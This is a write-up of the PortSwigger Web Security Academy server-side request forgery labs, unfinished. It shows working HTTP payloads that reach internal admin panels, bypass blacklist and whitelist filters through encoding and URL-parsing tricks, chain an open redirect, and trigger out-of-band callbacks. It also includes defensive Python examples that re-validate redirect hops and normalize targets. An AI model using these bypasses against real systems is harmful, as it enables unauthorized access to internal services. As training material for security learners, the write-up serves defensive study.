IN PROGRESS: WebSecurityAcademy (PortSwigger) – Server-side request forgery (SSRF)

Walk-through of the Server-side request forgery (SSRF) lab on PortSwigger Web Security Academy.

Apprentice – Basic SSRF against the local server

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

Vulnerable request

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1

Exploit

POST /product/stock HTTP/1.1
...

stockApi=http://localhost/admin

The response shows the other available admin APIs.

POST /product/stock HTTP/1.1
...

stockApi=http://localhost/admin/delete?username=carlos

Apprentice – Basic SSRF against another back-end system

This lab has a stock check feature which fetches data from an internal system. To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.

Send the request from the previous lab to the Intruder module in Burp Suite. Vary the IP part over 192.168.0.1-254 and check the server responses. IP 192.168.0.227 returns code 404.

POST /product/stock HTTP/1.1
...

stockApi=http://192.168.0.§X§:8080

Send request for 192.168.0.227 to the Repeater module.

POST /product/stock HTTP/1.1
...

stockApi=http://192.168.0.227:8080/admin/delete?username=carlos

Practitioner – SSRF with blacklist-based input filter

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos. The developer has deployed two weak anti-SSRF defenses that you will need to bypass.

  • On the Home page, click on View details for a product.
  • Click on Check stock.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1

Send the request to the Repeater module. Try to access 127.0.0.1.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2F127.0.0.1
HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 51

"External stock check blocked for security reasons"

Try to bypass the restriction on localhost. Use “127.1”, an alternative representation that resolves to 127.0.0.1.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2F127.1/
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: session=XNmKeRHfgJS2pvEvtz4IvoQ1MRzvWnP4; Secure; HttpOnly; SameSite=None
Connection: close
Content-Length: 10402

...
<a href="/admin">Admin panel</a>
...

Try to access /admin.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2F127.1/admin
HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 51

"External stock check blocked for security reasons"

Use double-encoding to obfuscate “admin”. For example, URL-encode the letter “a” (%61), then encode the “%” symbol (%25), so the letter “a” becomes %2561.

Use the Hackvertor extension to apply the encoding inline.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2F127.1/<@replace('%','%25')><@urlencode_all>admin/<@/urlencode_all><@/replace>
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Set-Cookie: session=gHJsWE2fVC4CTRdcoZoT4RSIoy4MCRlg; Secure; HttpOnly; SameSite=None
Connection: close
Content-Length: 2830

...
<a href="/admin/delete?username=carlos">Delete</a>
...

Delete user carlos.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2F127.1/<@replace('%','%25')><@urlencode_all>admin<@/urlencode_all><@/replace>/delete?username=carlos

Practitioner – SSRF with filter bypass via open redirection vulnerability

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://192.168.0.12:8080/admin and delete the user carlos. The stock checker has been restricted to only access the local application, so you will need to find an open redirect affecting the application first.

  • On the Home page, click on View details for a product.
GET /product?productId=1 HTTP/1.1
...
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 10417

...
<a href="/product/nextProduct?currentProductId=1&path=/product?productId=2">| Next product</a>
...

The Next product link contains a path parameter, which we can use as an open redirect. Send a request using the Repeater.

GET /product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin HTTP/1.1
...
HTTP/1.1 302 Found
Location: http://192.168.0.12:8080/admin
Connection: close
Content-Length: 0

  • On the Home page, click on View details for a product.
  • Click on Check stock.

POST /product/stock HTTP/1.1
...

stockApi=/product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin

Modify stockApi to the open redirect URL, URL-encoded with Hackvertor.

POST /product/stock HTTP/1.1
...

stockApi=<@urlencode>/product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin<@/urlencode>
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Connection: close
Content-Length: 2933

...
<a href="/http://192.168.0.12:8080/admin/delete?username=carlos">Delete</a>
...

Delete user carlos.

POST /product/stock HTTP/1.1
...

stockApi=<@urlencode>/product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin/delete?username=carlos<@/urlencode>
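The weakness in this lab is that the stock checker validates only the URL it is handed and then lets its HTTP client follow the 302 from the open redirect. The following added example (not the lab's code) simulates that flow against a constructed stand-in for the network, with a placeholder lab origin, and shows the fix: re-check the destination of every redirect hop.

```python
"""Added example: re-validate every redirect hop, not just the submitted URL."""
from urllib.parse import urljoin, urlsplit

APP = "https://lab-id.web-security-academy.net"  # placeholder for the lab's own origin

# Constructed stand-in for the network: absolute URL -> (status, Location or body).
RESPONSES = {
    APP + "/product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin":
        (302, "http://192.168.0.12:8080/admin"),
    "http://192.168.0.12:8080/admin":
        (200, '<a href="/admin/delete?username=carlos">Delete</a>'),
}


def same_origin(url: str) -> bool:
    """True when url points at the application itself (the lab's only allowed target)."""
    a, b = urlsplit(url), urlsplit(APP)
    return (a.scheme, a.hostname, a.port) == (b.scheme, b.hostname, b.port)


def stock_check(stock_api: str, validate_each_hop: bool, max_hops: int = 5):
    """Resolve stockApi against the app and follow redirects.
    validate_each_hop=False reproduces the lab's behaviour; True is the fix.
    Returns (final_url, body_or_reason)."""
    url = urljoin(APP + "/", stock_api)
    if not same_origin(url):
        return None, "blocked: not the local application"
    for _ in range(max_hops):
        status, payload = RESPONSES.get(url, (404, "Not Found"))
        if status != 302:
            return url, payload
        url = urljoin(url, payload)  # Location header, may be absolute
        if validate_each_hop and not same_origin(url):
            return url, "blocked: redirect leaves the local application"
    return url, "too many redirects"
```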

Practitioner – Blind SSRF with out-of-band detection

This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded. To solve the lab, use this functionality to cause an HTTP request to the public Burp Collaborator server.

  • On the Home page, click on View details for a product.
  • Send the request to the Repeater module.
GET /product?productId=1 HTTP/1.1
...
Referer: https://<LAB ID>.web-security-academy.net/
...

Replace the Referer HTTP header value with the Burp Collaborator URL.

GET /product?productId=1 HTTP/1.1
...
Referer: https://<BURP COLLABORATOR ID>.oastify.com/
...

The Burp Collaborator receives a request.

Expert – SSRF with whitelist-based input filter

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos. The developer has deployed an anti-SSRF defense you will need to bypass.

  • On the Home page, click on View details for a product.
  • Click on Check stock.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1

Send the request to the Repeater module. Try accessing the admin interface.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2Flocalhost/admin
HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 58

"External stock check host must be stock.weliketoshop.net"

Bypass the filter:

  • Credentials are accepted in the URL (http://username@stock.weliketoshop.net). Put localhost in the credentials position instead.
  • We want to generate this URL: http://localhost#@stock.weliketoshop.net/admin. Double-URL-encode the # as %2523, so the filter parses stock.weliketoshop.net as the host while the component that makes the request decodes the # and connects to localhost.

POST /product/stock HTTP/1.1
...

stockApi=http://localhost%2523@stock.weliketoshop.net/admin
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Set-Cookie: session=zhWwrVfnYDfAMImLLUxp2fNW4JWnGr0r; Secure; HttpOnly; SameSite=None
Connection: close
Content-Length: 2830

...
<a href="/admin/delete?username=carlos">Delete</a>
...

Delete user carlos.

POST /product/stock HTTP/1.1
...

stockApi=http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos
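The blacklist lab (127.1, double-encoded admin), the internal-range lab (192.168.0.X) and the whitelist lab (localhost%2523@stock.weliketoshop.net) all beat filters that reason about the raw string or parse it differently from the HTTP client. The following added example (not the labs' code) reproduces both naive filters next to checks that decide on the fully decoded, parsed and normalized target; the allowed host and port are taken from the stock checker's original URL.

```python
"""Added example: string-based SSRF filters vs. checks on the normalized target."""
import ipaddress
import socket
from urllib.parse import unquote, urlsplit

ALLOWED_HOST, ALLOWED_PORT = "stock.weliketoshop.net", 8080  # the checker's real backend

def fully_decode(url: str) -> str:
    """Percent-decode until stable, so %2561, %61 and 'a' all compare equal."""
    decoded = unquote(url)
    while decoded != url:
        url, decoded = decoded, unquote(decoded)
    return url

def naive_blacklist_allows(url: str) -> bool:
    """Blacklist lab style: decode once and look for forbidden substrings."""
    decoded = unquote(url).lower()
    return not any(s in decoded for s in ("127.0.0.1", "localhost", "admin"))

def address_denylist_allows(url: str) -> bool:
    """Deny by normalized address instead: inet_aton folds 127.1 to 127.0.0.1.
    Resolving names and checking each address is omitted so this runs offline."""
    host = urlsplit(fully_decode(url)).hostname or ""
    if host == "localhost":
        return False
    try:
        packed = socket.inet_aton(host)
    except OSError:
        return True  # not an IPv4 literal
    ip = ipaddress.ip_address(packed)
    return not (ip.is_loopback or ip.is_private or ip.is_link_local)

def naive_whitelist_allows(url: str) -> bool:
    """Whitelist lab style: decode once, parse, compare only the hostname."""
    return urlsplit(unquote(url)).hostname == ALLOWED_HOST

def fetcher_host(url: str) -> str:
    """Host an HTTP client that decodes a second time would actually contact."""
    return urlsplit(fully_decode(url)).hostname or ""

def strict_whitelist_allows(url: str) -> bool:
    """Decode fully, parse once, reject userinfo and fragments, then require
    exactly the expected scheme, host and port."""
    p = urlsplit(fully_decode(url))
    if p.scheme != "http" or p.username is not None or p.fragment:
        return False
    return p.hostname == ALLOWED_HOST and p.port == ALLOWED_PORT
```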

Expert – Blind SSRF with Shellshock exploitation

This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded. To solve the lab, use this functionality to perform a blind SSRF attack against an internal server in the 192.168.0.X range on port 8080. In the blind attack, use a Shellshock payload against the internal server to exfiltrate the name of the OS user.

  • Install the Collaborator Everywhere extension for Burp Suite.
  • Add the domain (<LAB ID>.web-security-academy.net) of the lab to Burp Suite’s target scope, so that Collaborator Everywhere will target it.
  • Navigate the webapp.
  • In the Target tab, new issues will be created for /product:
    • Collaborator Pingback (HTTP): Referer
    • Collaborator Pingback (HTTP): User-Agent